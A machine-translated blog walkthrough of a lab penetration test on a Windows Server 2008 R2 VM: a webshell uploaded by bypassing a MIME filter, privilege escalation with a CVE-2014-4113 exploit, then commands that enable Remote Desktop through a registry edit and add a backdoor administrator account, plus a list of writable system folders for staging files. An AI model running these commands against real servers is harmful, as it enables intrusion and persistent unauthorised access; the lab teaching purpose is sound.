当前位置:网站首页>111. Network security penetration test - [privilege escalation 9] - [windows 2008 R2 kernel overflow privilege escalation]

111. Network security penetration test - [privilege escalation 9] - [windows 2008 R2 kernel overflow privilege escalation]

2022-07-07 12:03:00 qwsn

In my submission , Whether studying safety or engaging in safety , More or less, I have some feelings and sense of mission !!!

One 、Windows Kernel overflow rights [2008]

1、 Background of kernel overflow rights :

        stay winserver2008 R2 in , By default, the server supports aspx Of . So by default, you can execute some commands . If there is no patch, you can use some overflow rights raising tools , Right to raise .

2、CVE-2014-4113-Exploit

        This version of the rights raising tool , It can be done to winserver2008 The system carries out overflow and right lifting

3、 Kernel overflow authorization process :

(1) Experimental environment :

1. Target environment :
(1) virtual machine Windows2008【target_sys.com】【192.168.97.131】
(2) Scripting language environment :php/asp The language environment exists 

2. attack :
(1) virtual machine Win7【192.168.97.130】
(2)Firefox+Burpsuite+ Ant sword + Malaysia 

3. The network environment :
(1)VMware Built NAT The Internet 

(2) Target link :

URL:http://target_sys.com/upload.php

(3) Experimental process :

First step : Visit the target link , utilize MIME Break through the type limit of the white list , Upload up.aspx Malaysia  Insert picture description here
【 The above process is a little 】 The following is the right raising process :

The second step : Connect up.aspx Malaysia 【 The password for admin】, And click the [CmdShell] modular , call cmd.exe perform whoami command , View current user information , Discovery permissions are low
 Insert picture description here
stay winserver2008 R2 in , By default, the server supports aspx Of . So by default, you can execute some commands :
 Insert picture description here
The third step : Click on [CmdShell] modular , call cmd.exe perform systeminfo command , Copy the results , And then use it wes.py Script scanning vulnerability , But it didn't come out
 Insert picture description here
Scan results : Scan fail
 Insert picture description here
Step four : hold systeminfo Put your information into In this website , Retrieve relevant rights exp, Finally found CVE-2014-4113 Right can be raised . At the same time, we go through msfconsole, type search kernel You can also retrieve some exp, Enter one by one and then type info, Found some are 2008R2 The right to raise exp, Image below ms14-058 It's corresponding to CVE-2014-4113.

exp Portal
 Insert picture description here

 Insert picture description here
Step five : Click on [File Manager] File management module , Upload rw.aspx Used to scan readable and writable folders
 Insert picture description here

Step six : Visit the just uploaded rw.aspx Malaysia , Scan readable and writable folders

As shown in the figure below , We scanned some readable and writable folders , After incomplete testing , It is found that the root directory of the website can be used .

 Insert picture description here
Step seven : Back to Malaysia just now , Upload CVE-2014-4113-Exploit Of exp To c:\inetpub\wwwroot\target_sys.com Next
 Insert picture description here
Step eight : Click on [CmdShell] modular , call cmd Execute the just passed cve-2017-4113 Of exp, As shown below , Successful overflow

 Insert picture description here
Step nine : Execute the following commands in turn , Turn on 3389 port , Add administrator group users demo1, Finally, connect the target remotely .

/c c:\inetpub\wwwroot\target_sys.com\Win64.exe "netstat -ano" # View port status
 Insert picture description here
/c c:\inetpub\wwwroot\target_sys.com\Win64.exe "REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal\" \"Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f" # Turn on 3389
 Insert picture description here
/c c:\inetpub\wwwroot\target_sys.com\Win64.exe "netstat -ano" # Verify that it is on 3389
 Insert picture description here

/c c:\inetpub\wwwroot\target_sys.com\Win64.exe "net user demo1 123 /add"# Add users demo1/213
 Insert picture description here
/c c:\inetpub\wwwroot\target_sys.com\Win64.exe "net localgroup administrators demo1 /add" # hold demo1 Users join the administrators group
 Insert picture description here

/c c:\inetpub\wwwroot\target_sys.com\Win64.exe "net user" # verification demo1 Does the user exist
 Insert picture description here
mstsc Remote Desktop Connection :

 Insert picture description here

    attach : Common read / write directories

≤2003 Read write table of contents

C:\RECYCLER\
D:\RECYCLER\
E:\RECYCLER\
C:\Windows\temp\
C:\Windows\Debug\
C:\Windows\Registration\CRMLog\
C:\Documents and Settings\All Users\Documents\

≥2008 Read write table of contents

C:\ProgramData\
C:\Windows\temp\
C:\Windows\Tasks\
C:\Windows\tracing\    // It can't be deleted 
C:\Windows\debug\WIA\
C:\Windows\servicing\Sessions\
C:\Windows\servicing\Packages\
C:\Windows\Registration\CRMLog\
C:\Windows\System32\spool\drivers\color\
C:\Users\Default\AppData\    // It can't be deleted 
C:\ProgramData\Microsoft\DeviceSync\
C:\ProgramData\Microsoft\Crypto\DSS\MachineKeys\
C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\
C:\ProgramData\Microsoft\User Account Pictures\    // It can't be deleted 
C:\Users\All Users\Microsoft\NetFramework\BreadcrumbStore\    // It can't be deleted 
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys\
C:\Windows\syswow64\tasks\microsoft\Windows\pla\system\
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Temporary ASP.NET Files\
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Temporary ASP.NET Files\
C:\Windows\System32\catroot2\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\
C:\Windows\System32\catroot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\
原网站

版权声明
本文为[qwsn]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/188/202207070958140429.html

随机推荐